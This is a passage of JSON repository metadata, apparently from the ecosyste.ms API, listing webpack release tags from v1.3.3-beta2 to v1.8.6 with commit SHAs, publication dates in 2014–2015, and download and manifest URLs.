ifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"af22dce84cb13facf372f179a6a174cafa0397dd","kind":"tag","published_at":"2015-04-08T06:11:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"1f74f58273ae008e315275c6caa31ae3fad42551","kind":"tag","published_at":"2015-04-07T12:34:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.0/manifests"},{"name":"v1.7.3","sha":"b1da5ed5c69f02cb9a4215a56157267b1de9a11b","kind":"commit","published_at":"2015-03-11T22:50:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"17d9dc161c7c8f969d83cb8503fead40db9798d9","kind":"commit","published_at":"2015-03-04T06:45:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"d09c8e713823c705cefea77bc34db6ab0e1cc0c3","kind":"commit","published_at":"2015-03-03T22:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.1/manifests"},{"name":"v1.7.0","sha":"e5b5fa6da79def97ac6c1017f3595fcefd5a74dd","kind":"commit","published_at":"2015-03-03T19:43:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.0/manifests"},{"name":"v1.6.0","sha":"ad81998305456c8447ce09d5ef2d4c950f7a4184","kind":"commit","published_at":"2015-02-23T22:02:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.6.0/manifests"},{"name":"v1.5.3","sha":"e46e5cbc514b17cc893dde394edc9a8a25baa5eb","kind":"commit","published_at":"2015-01-21T19:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"bdabadf34f871fd19b1f960df6b8ab15ea915154","kind":"commit","published_at":"2015-01-21T19:25:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"558ee89277d41529ff143af8e050f4c2917ea4b6","kind":"commit","published_at":"2015-01-17T23:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"0e36e7e936b126dba526bddac557566ee982c432","kind":"commit","published_at":"2015-01-17T22:43:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.5.0/manifests"},{"name":"v1.4.15","sha":"431bd659be6dcd35fbe993a3a528d5774e82f745","kind":"commit","published_at":"2014-12-28T00:26:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.15/manifests"},{"name":"v1.4.14","sha":"6c45e24e4039f7298bfa8ca08a9614abc7aeaf08","kind":"commit","published_at":"2014-12-22T14:29:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.14/manifests"},{"name":"v1.4.13","sha":"34c509740b722ac9898ed262f88a8bba9d3237b7","kind":"commit","published_at":"2014-11-05T23:28:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.13/manifests"},{"name":"v1.4.12","sha":"5edcaea76d900134a50e5a16a07ab5da75c80c6a","kind":"commit","published_at":"2014-11-03T07:10:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.12/manifests"},{"name":"v1.4.11","sha":"8c606b490b248000466cc5be01019ce7d2eea407","kind":"commit","published_at":"2014-11-02T12:18:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":n